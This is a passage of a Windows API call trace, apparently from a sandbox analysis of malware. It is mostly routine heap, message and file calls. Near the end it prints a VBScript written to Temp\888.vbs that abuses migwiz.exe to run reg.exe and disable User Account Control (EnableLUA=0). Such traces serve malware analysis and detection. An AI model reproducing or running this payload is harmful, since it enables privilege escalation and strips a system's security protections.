dwMilliseconds=0xa) returned 0x102 [0140.478] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0140.478] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0142.300] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.301] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0142.316] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.316] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0142.338] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.338] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0142.352] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.352] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0142.384] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.384] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0142.473] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.473] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0142.490] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.490] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0142.508] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.508] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0142.525] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.525] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0142.538] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.538] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0142.553] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.553] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0142.569] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.569] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0142.585] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.585] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0142.602] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.602] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0142.615] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.616] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0142.631] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.631] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0142.647] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0142.647] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0142.647] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0142.647] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0142.647] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0142.647] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.647] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0142.665] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.665] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x0 [0142.674] GetExitCodeProcess (in: hProcess=0x168, lpExitCode=0x8bf794 | out: lpExitCode=0x8bf794*=0x0) returned 1 [0142.674] CloseHandle (hObject=0x168) returned 1 [0142.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0142.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1158 | out: hHeap=0x25c0000) returned 1 [0142.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9000 | out: hHeap=0x25c0000) returned 1 [0142.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8f40 | out: hHeap=0x25c0000) returned 1 [0142.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0142.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b0f98 | out: hHeap=0x25c0000) returned 1 [0142.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9090 | out: hHeap=0x25c0000) returned 1 [0142.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d60 | out: hHeap=0x25c0000) returned 1 [0142.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9150 | out: hHeap=0x25c0000) returned 1 [0142.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0142.674] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0142.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0142.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9150 [0142.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b0f98 [0142.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d60 [0142.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9090 [0142.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1158 [0142.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8f40 [0142.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1158 | out: hHeap=0x25c0000) returned 1 [0142.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0142.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1158 [0142.675] CharUpperBuffW (in: lpsz="TempDir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0142.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9000 [0142.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91b0 [0142.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a91e0 [0142.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91c8 [0142.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9000 | out: hHeap=0x25c0000) returned 1 [0142.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9000 [0142.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0142.675] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0142.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8f28 [0142.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0142.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1058 [0142.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0142.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0142.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1158 | out: hHeap=0x25c0000) returned 1 [0142.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91c8 | out: hHeap=0x25c0000) returned 1 [0142.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91e0 | out: hHeap=0x25c0000) returned 1 [0142.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9000 | out: hHeap=0x25c0000) returned 1 [0142.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91b0 | out: hHeap=0x25c0000) returned 1 [0142.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8f40 | out: hHeap=0x25c0000) returned 1 [0142.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9090 | out: hHeap=0x25c0000) returned 1 [0142.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d60 | out: hHeap=0x25c0000) returned 1 [0142.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1158 [0142.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0142.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d60 [0142.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24207f0 [0142.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0142.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d60 | out: hHeap=0x25c0000) returned 1 [0142.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0142.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1158 | out: hHeap=0x25c0000) returned 1 [0142.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b0f98 | out: hHeap=0x25c0000) returned 1 [0142.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d60 [0142.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b0f98 [0142.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9090 [0142.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1158 [0142.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0142.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8f40 [0142.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91b0 [0142.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0142.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9000 [0142.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0142.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0142.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0142.676] CharUpperBuffW (in: lpsz="CRLF", cchLength=0x4 | out: lpsz="CRLF") returned 0x4 [0142.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91e0 [0142.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91c8 [0142.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8d90 [0142.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8c88 [0142.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91e0 | out: hHeap=0x25c0000) returned 1 [0142.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a91e0 [0142.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0142.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90f0 [0142.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9138 [0142.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1068 [0142.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0142.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0142.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0142.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8c88 | out: hHeap=0x25c0000) returned 1 [0142.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d90 | out: hHeap=0x25c0000) returned 1 [0142.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91e0 | out: hHeap=0x25c0000) returned 1 [0142.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91c8 | out: hHeap=0x25c0000) returned 1 [0142.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9000 | out: hHeap=0x25c0000) returned 1 [0142.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91b0 | out: hHeap=0x25c0000) returned 1 [0142.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8f40 | out: hHeap=0x25c0000) returned 1 [0142.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0142.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0142.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9138 | out: hHeap=0x25c0000) returned 1 [0142.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1068 | out: hHeap=0x25c0000) returned 1 [0142.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90f0 | out: hHeap=0x25c0000) returned 1 [0142.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90f0 [0142.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x140) returned 0x249c7b0 [0142.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0142.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90f0 | out: hHeap=0x25c0000) returned 1 [0142.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90f0 [0142.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9138 [0142.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1068 [0142.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8f40 [0142.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1068 | out: hHeap=0x25c0000) returned 1 [0142.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416270 [0142.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1068 [0142.678] CharUpperBuffW (in: lpsz="CRLF", cchLength=0x4 | out: lpsz="CRLF") returned 0x4 [0142.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91b0 [0142.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9000 [0142.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a91c8 [0142.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91e0 [0142.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91b0 | out: hHeap=0x25c0000) returned 1 [0142.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a91b0 [0142.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0142.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d90 [0142.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8c88 [0142.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1048 [0142.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0142.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0142.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1068 | out: hHeap=0x25c0000) returned 1 [0142.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91e0 | out: hHeap=0x25c0000) returned 1 [0142.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91c8 | out: hHeap=0x25c0000) returned 1 [0142.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91b0 | out: hHeap=0x25c0000) returned 1 [0142.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9000 | out: hHeap=0x25c0000) returned 1 [0142.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8f40 | out: hHeap=0x25c0000) returned 1 [0142.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9138 | out: hHeap=0x25c0000) returned 1 [0142.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90f0 | out: hHeap=0x25c0000) returned 1 [0142.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8c88 | out: hHeap=0x25c0000) returned 1 [0142.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1048 | out: hHeap=0x25c0000) returned 1 [0142.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d90 | out: hHeap=0x25c0000) returned 1 [0142.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d90 [0142.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x430) returned 0x2416270 [0142.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0142.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d90 | out: hHeap=0x25c0000) returned 1 [0142.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d90 [0142.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d90 | out: hHeap=0x25c0000) returned 1 [0142.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d90 [0142.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d90 | out: hHeap=0x25c0000) returned 1 [0142.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0142.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1158 | out: hHeap=0x25c0000) returned 1 [0142.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b0f98 | out: hHeap=0x25c0000) returned 1 [0142.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d720 [0142.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24b2e00 [0142.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d90 [0142.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b0f98 [0142.680] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\888.vbs" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\888.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0142.680] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.680] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf81c | out: lpNewFilePointer=0x0) returned 1 [0142.680] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.680] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf7fc | out: lpNewFilePointer=0x0) returned 1 [0142.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24c2e08 [0142.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1158 [0142.681] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf810 | out: lpNewFilePointer=0x0) returned 1 [0142.681] ReadFile (in: hFile=0x168, lpBuffer=0x24b2e00, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf824, lpOverlapped=0x0 | out: lpBuffer=0x24b2e00*, lpNumberOfBytesRead=0x8bf824*=0x0, lpOverlapped=0x0) returned 1 [0142.681] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.681] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf7fc | out: lpNewFilePointer=0x0) returned 1 [0142.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1158 | out: hHeap=0x25c0000) returned 1 [0142.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c2e08 | out: hHeap=0x25c0000) returned 1 [0142.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8c88 [0142.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1158 [0142.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="File = \"C:\\Windows\\System32\\cmd.exe\"\r\nSet shll = CreateObject(\"Wscript.Shell\")\r\nshll.run(\"C:\\Windows\\System32\\migwiz\\migwiz.exe \" & File & \" /c %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f\"),0,false", cchWideChar=281, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 281 [0142.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x119) returned 0x249c7b0 [0142.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="File = \"C:\\Windows\\System32\\cmd.exe\"\r\nSet shll = CreateObject(\"Wscript.Shell\")\r\nshll.run(\"C:\\Windows\\System32\\migwiz\\migwiz.exe \" & File & \" /c %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f\"),0,false", cchWideChar=281, lpMultiByteStr=0x249c7b0, cbMultiByte=281, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="File = \"C:\\Windows\\System32\\cmd.exe\"\r\nSet shll = CreateObject(\"Wscript.Shell\")\r\nshll.run(\"C:\\Windows\\System32\\migwiz\\migwiz.exe \" & File & \" /c %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f\"),0,false", lpUsedDefaultChar=0x0) returned 281 [0142.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8c88 | out: hHeap=0x25c0000) returned 1 [0142.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x120) returned 0x24166a8 [0142.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0142.682] WriteFile (in: hFile=0x168, lpBuffer=0x24166a8*, nNumberOfBytesToWrite=0x118, lpNumberOfBytesWritten=0x8bf820, lpOverlapped=0x0 | out: lpBuffer=0x24166a8*, lpNumberOfBytesWritten=0x8bf820*=0x118, lpOverlapped=0x0) returned 1 [0142.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24166a8 | out: hHeap=0x25c0000) returned 1 [0142.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1158 | out: hHeap=0x25c0000) returned 1 [0142.682] CloseHandle (hObject=0x168) returned 1 [0142.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d90 | out: hHeap=0x25c0000) returned 1 [0142.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b0f98 | out: hHeap=0x25c0000) returned 1 [0142.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0142.683] HeapFree (in: 